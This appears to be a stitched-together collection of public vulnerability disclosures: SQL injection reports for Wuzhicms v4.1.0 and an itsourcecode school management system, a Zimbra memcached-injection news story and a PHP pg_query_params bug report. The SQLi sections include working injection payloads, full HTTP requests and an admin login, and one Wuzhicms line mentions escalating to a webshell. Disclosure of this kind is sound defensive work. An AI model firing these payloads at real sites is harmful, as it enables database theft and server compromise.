SQL injection vulnerabilities exist in Wuzhicms v4.1.0 which allows attackers to execute arbitrary SQL commands via the $keyValue parameter in /coreframe/app/pay/admin/index.php

**There are 3 SQL injections in Wuzhicms v4.1.0 background****one****Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 30-98

	public function listing(){
		$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
		$keytype = isset($GLOBALS\['keytype'\]) ? intval($GLOBALS\['keytype'\]) : 0;
		$payments = $this\->payments;
		$status\_arr = $this\->status\_arr;
		$page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
		$page = max($page, 1);
		$status = $GLOBALS\['status'\];

		if ($status) {
			$where = 'status=' . $status;
		} else {
			$where = 'status>0';
		}
		if ($keytype) {
			$where .= " AND \`keytype\`='$keytype'";
		}
		$keyValue = strip\_tags($GLOBALS\['keyValue'\]);
		$fieldtype = intval($GLOBALS\['fieldtype'\]);
		if ($keyValue) {
			switch ($fieldtype) {
				case 0:
					$where .= " AND \`order\_no\`='$keyValue'";
					break;
				case 1:
					$where .= " AND \`telephone\`='$keyValue'";
					break;
				case 2:
					$where .= " AND \`kf\_username\`='$keyValue'";
					break;
				case 3:
					$where .= " AND \`jxs\_username\`='$keyValue'";
					break;
			}
		}

		if ($\_SESSION\['role'\] == 4) {
			//客服
			$kf\_username = get\_cookie('username');
			$where .= " AND \`kf\_username\`='$kf\_username'";
		}
		$starttime = '';
		$endtime = '';
		if ($GLOBALS\['starttime'\]) {
			$starttime = strtotime($GLOBALS\['starttime'\]);
			$where .= " AND \`addtime\`>'$starttime'";
		}
		if ($GLOBALS\['endtime'\]) {
			$endtime = strtotime($GLOBALS\['endtime'\]);
			$where .= " AND \`endtime\`<'$endtime'";
		}
		if(isset($GLOBALS\['exp'\])) {
			$pagesize = 1000;
		} else {
			$pagesize = 20;
		}

		$admin\_result = $this\->db\->get\_list('admin', array('role' => 4), '\*', 0, 20, 0);
		$result = $this\->db\->get\_list('pay', $where, '\*', 0, $pagesize, $page, 'id DESC');
		if(isset($GLOBALS\['exp'\])) {
			$this\->export\_excel($result);
		}
		$pages = $this\->db\->pages;
		$total = $this\->db\->number;
		$pay\_config = get\_config('pay\_config');
		load\_class('form');

		include $this\->template('listing');
	}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**two**

The second SQL injection and the first SQL injection are in a different function in the same file!

**Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 244-289

public function relay(){
		$id = intval($GLOBALS\['id'\]);
		$r = $this\->db\->get\_one('pay', array('id' => $id));
		$r2 = $this\->db\->get\_one('pay\_detail', array('id' => $id));
		$r = array\_merge($r, $r2);
		$keyValue = '';
		$keyType = '';
		if (isset($GLOBALS\['keyType'\])) {
			$keyType = $GLOBALS\['keyType'\];
			$keyValue = $GLOBALS\['keyValue'\];
			if ($keyValue) {
				$where = "modelid=11 AND \`$keyType\` LIKE '%$keyValue%'";
				$result = $this\->db\->get\_list('member', $where, '\*', 0, 20, 0, 'uid DESC');
			}
		} elseif (isset($GLOBALS\['submit'\])) {
			load\_function('common', 'pay');
			$formdata = array();
			$formdata\['order\_no'\] = create\_order\_no();
			$formdata\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata\['username'\] = $r\['linkman'\];
			$formdata\['mobile'\] = $r\['telephone'\];
			$formdata\['pinpai'\] = $r\['data1'\];
			$formdata\['chexing'\] = $r\['data3'\];
			$formdata\['addtime'\] = $r\['addtime'\];
			$formdata\['keytype'\] = 0;//游客订单
			$formdata\['zftime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_relay', $formdata);
			$formdata2 = array();
			$formdata2\['op\_uid'\] = $\_SESSION\['uid'\];
			$formdata2\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata2\['to\_username'\] = $GLOBALS\['to\_username'\];
			$formdata2\['updatetime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_history', $formdata2);
			// $this->db->update('demand', array('flag'=>1),array('did' => $did));
			$this\->db\->update('pay', array('jxs\_username' => $formdata2\['to\_username'\]), array('id' => $id));
			$forward = strip\_tags($GLOBALS\['forward'\]);
			MSG('发送成功', $forward);
		} else {
			$uid = $\_SESSION\['uid'\];
			$where = "op\_uid='$uid'";
			$data = $this\->db\->get\_one('demand\_history', $where, '\*', 0, 'hid DESC');
			$forward = strip\_tags($GLOBALS\['forward'\]);

		}
		include $this\->template('pay\_relay');
	}

Set $keyType=uid  and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**three****Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability**

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

**Vulnerability file:**

coreframe/app/order/admin/index.php 22-87

public function listing() {
    load\_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS\['flag'\];
    $status = array();
    $status\[1\] = '待发货';
    $status\[2\] = '已发货';
    $status\[3\] = '订单完成';

    $status\_arr = $this\->status\_arr;
    $page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
    $page = max($page,1);
    $keyValue = strip\_tags($GLOBALS\['keyValue'\]);
    $fieldtype = intval($GLOBALS\['fieldtype'\]);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND \`order\_no\`='$keyValue'";
                break;
            case 1:
                $where .= " AND \`remark\` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this\->db\->get\_one('member', array('username' => $keyValue));
                $uid = $r\['uid'\];
                $where .= " AND \`uid\`='$uid'";
                break;
            case 3:
                $where .= " AND \`snid\`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag\==0 || $flag) $where .=" AND \`status\`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS\['starttime'\]) {
        $starttime = strtotime($GLOBALS\['starttime'\]);
        $where .= " AND \`addtime\`>'$starttime'";
    }
    if($GLOBALS\['endtime'\]) {
        $endtime = strtotime($GLOBALS\['endtime'\]);
        $where .= " AND \`addtime\`<'$endtime'";
    }
    $result\_arr = $this\->db\->get\_list('order\_point', $where, '\*', 0, 20,$page,'orderid DESC');

Set $fieldtype\=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1
    

    Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
    Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
    

    https://github.com/wuzhicms/wuzhicms/issues/198
    
    

    Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)
    
    Use sql injection to elevate permissions and write webshell
    Individual

CVE-2021-41654: There are 3 SQL injections in Wuzhicms v4.1.0 background · Issue #198 · wuzhicms/wuzhicms

Attackers could also potentially gain access to various internal services, researcher warns

Attackers could also potentially gain access to various internal services, researcher warns

A memcached injection vulnerability in business webmail platform Zimbra could allow attackers to steal login credentials without user interaction, security researchers have revealed.

Zimbra, an open source alternative to services including Microsoft Exchange, is used by more than 200,000 businesses and more than 1,000 government and financial institutions worldwide, according to its developer, Synacor.

Simon Scannell, vulnerability researcher at Swiss security firm Sonar (formerly SonarSource), has documented how unauthenticated attackers could poison an unsuspecting victim’s cache.

It is then possible to steal cleartext credentials from the Zimbra instance, when the mail client connects to the Zimbra server, as demonstrated in the following proof-of-concept video:

Because newline characters () were not escaped in untrusted user input, attackers could inject arbitrary memcached commands into a targeted instance and trigger an overwrite of arbitrary cached entries.

Memcached servers store key/value pairs that can be set and retrieved with a simple text-based protocol and interpret incoming data line by line.

**Escalation risk**

Zimbra users have been urged to upgrade their installations immediately, given the potential impact of successful exploitation.

**RECOMMENDED** Oblivious DNS-over-HTTPS offers privacy enhancements to secure lookup protocol

The severity of the vulnerability (CVE-2022-27924) is listed as ‘high’ (CVSS 7.5) rather than ‘critical’, but once a mailbox is breached, “attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal highly sensitive information”, Scannell warned.

“With mail access, attackers can reset passwords, impersonate their victims, and silently read all private conversations within the targeted company.”

**Continuous injections**

Attackers could poison victims’ IMAP route cache entries by ascertaining the victim’s email address – an easy enough task with OSINT methods – but the researchers also successfully deployed response smuggling to steal cleartext credentials without first obtaining this information.

“By continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response,” explained Scannell.

“This works because Zimbra did not validate the key of the Memcached response when consuming it. By exploiting this behavior, we can hijack the proxy connection of random users connecting to our IMAP server without having to know their email addresses.”

**Holding the newline**

The flaw affects both open source and commercial versions of Zimbra in their default configurations.

The flaws were reported on March 11 and an initial fix, released on March 31, failed to properly address the issue. The comprehensively patched versions are 8.8.15 with patch level 31.1 and 9.0.0 with patch level 24.1.

Catch up with the latest security research news

“Zimbra patched the vulnerability by creating a SHA-256 hash of all Memcache keys before sending them to the Memcache server,” said Scannell. “As the hex-string representation of a SHA-256 can’t contain whitespaces, no new-lines can be injected anymore.”

**Sonar disclosed the flaw on June 14.**

Scannell concluded his write-up by observing that cross-site scripting (XSS) and SQL injection flaws arising from a lack of input escaping “have been well known and documented for decades”, but that “other injection vulnerabilities can occur that are less known and can have a critical impact”.

As a consequence, Scannell recommends that developers “be aware of special characters that should be escaped when dealing with technology where less documentation and research about potential vulnerabilities exists”.

The vulnerability has emerged four months after Zimbra released a hotfix for an XSS flaw whose abuse underpinned a series of sophisticated spear-phishing campaigns linked to an unknown Chinese threat group.

Sonar also discovered a pair of Zimbra vulnerabilities last year that, if combined, allowed unauthenticated attackers to gain control of Zimbra servers.

**RELATED** Horde Webmail contains zero-day RCE bug with no patch on the horizon

Business email platform Zimbra patches memcached injection flaw that imperils user credentials

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.

CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when using Postgres database extension, supplying invalid parameters to the parametrized query may lead to PHP attempting to free memory using uninitialized data as pointers. This could lead to RCE vulnerability or denial of service.

Sec Bug #81720

Uninitialized array in pg\_query\_params() leading to RCE

Submitted:

2022-05-16 14:50 UTC

Modified:

2022-06-06 07:13 UTC

From:

c dot fol at ambionics dot io

Assigned:

stas (profile)

Status:

Closed

Package:

PostgreSQL related

PHP Version:

8.1.6

OS:

Private report:

No

CVE-ID:

2022-31625

 **\[2022-05-16 14:50 UTC\] c dot fol at ambionics dot io**

Description:
------------
Hello PHP team,

in PHP\_FUNCTION(pg\_query\_params), the array meant to store the char\* representation of the query parameters is allocated on the heap, but not cleared:

\`\`\`
params = (char \*\*)safe\_emalloc(sizeof(char \*), num\_params, 0);
\`\`\`

If a conversion error happens (for instance, one of the params is an object), \`\_php\_pgsql\_free\_params()\` gets called \*on the whole array\*. Since the array is not initialized, a lingering value from a previous request can get freed, leading in the end to remote code execution.

To patch, use calloc or memset-0 it.

There are other functions where you use basically the same code (if cannot convert to string, then free all params) so it might be worth a look.

Patch: 

\`\`\`
- \_php\_pgsql\_free\_params(params, num\_params);
+ \_php\_pgsql\_free\_params(params, i);
\`\`\`

Best regards,
Charles Fol
ambionics.io


Test script:
---------------
<?php

$strings = \[\];

function uenc($v)
{
    $out = '';
    for($i=0; $i<strlen($v);$i++)
    {
        $out .= '\\u' . '00' . str\_pad(dechex(ord($v\[$i\])), 2, '0', STR\_PAD\_LEFT);
    }
    return '"' . $out . '"';
}

$json = 
    '{"a": 1, "args":\[
        "A","A","A",
        {}
    \]}'
;
$c = pg\_connect('host=172.17.0.3 user=postgres password=password');

$data = json\_decode($json);

$resultXXX = pg\_query\_params($c, 'SELECT \* FROM test WHERE x NOT IN ($1)', $data->args);
// var\_dump(pg\_fetch\_all($resultXXX));

Expected result:
----------------
No crash.

Actual result:
--------------
Crash.

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Assigned To: +Assigned To: cmb

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

Thanks for reporting!  I can confirm the issue.  I'll have a
closer look.

 **\[2022-05-17 11:17 UTC\] c dot fol at ambionics dot io**

Cool !

I'm wondering if you also got the previous bug, #81719, related to PDO. I didn't receive a confirmation email.

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

\-Assigned To: cmb +Assigned To: stas

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

Proposed patch:
<https://gist.github.com/cmb69/b2b5ab0cb54a5683fe3aff4c7c09f7c2\>.

While fixing this issue, I noticed that pg\_send\_execute() tries to
convert the $params elements to string, but checks the wrong
variable (\`tmp\` instead of \`tmp\_str\`), what may cause a segfault.
The patch also fixes this.

As to whether this is actually a security issue: any potential
exploit requires the script to pass values which are not coercible
to string to the $params parameter of \`pg\_query\_params()\` or
\`pg\_send\_execute()\`.  That might be regarded as sloppy userland
programming, so I'm not sure if we classify this as security
issue.  On the other hand, the documentation is not explicit about
this conversion to string requirement (although the placeholders
hint at it).

Stas, what do you think?

> I'm wondering if you also got the previous bug, #81719, related
> to PDO.

I'll have a look at that right away.

 **\[2022-05-25 21:36 UTC\] stas@php.net**

\-CVE-ID: needed +CVE-ID: 2022-31625

 **\[2022-06-06 07:13 UTC\] git@php.net**

\-Status: Verified +Status: Closed

CVE-2022-31625: Uninitialized array in pg_query_params() leading to RCE

Microsoft SQL Server Remote Code Execution Vulnerability.

CVE-2022-29143

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_classroom.php?id=.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_classroom.php?id=

Vulnerability location: /school/model/get\_classroom.php?id=,id

\[+\] Payload: /school/model/get\_classroom.php?id=-18%20union%20select%201,database(),3--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_classroom.php?id\=\-18%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32370: bug_report/SQLi-2.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher.php?id=

Vulnerability location: /school/model/get\_teacher.php?id=,id

\[+\] Payload: /school/model/get\_teacher.php?id=-10%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_teacher.php?id\=\-10%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32371: bug_report/SQLi-1.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject.php?id=

Vulnerability location: /school/model/get\_subject.php?id=,id

\[+\] Payload: /school/model/get\_subject.php?id=-15%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject.php?id\=\-15%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32372: bug_report/SQLi-4.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject_routing.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject\_routing.php?id=

Vulnerability location: /school/model/get\_subject\_routing.php?id=,id

\[+\] Payload: /school/model/get\_subject\_routing.php?id=-23%20union%20select%201,2,database(),4,5--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject\_routing.php?id\=\-23%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32374: bug_report/SQLi-5.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_grade.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_grade.php?id=

Vulnerability location: /school/model/get\_grade.php?id=,id

\[+\] Payload: /school/model/get\_grade.php?id=-13%20union%20select%201,database(),3,4--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_grade.php?id\=\-13%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

Tag

#sql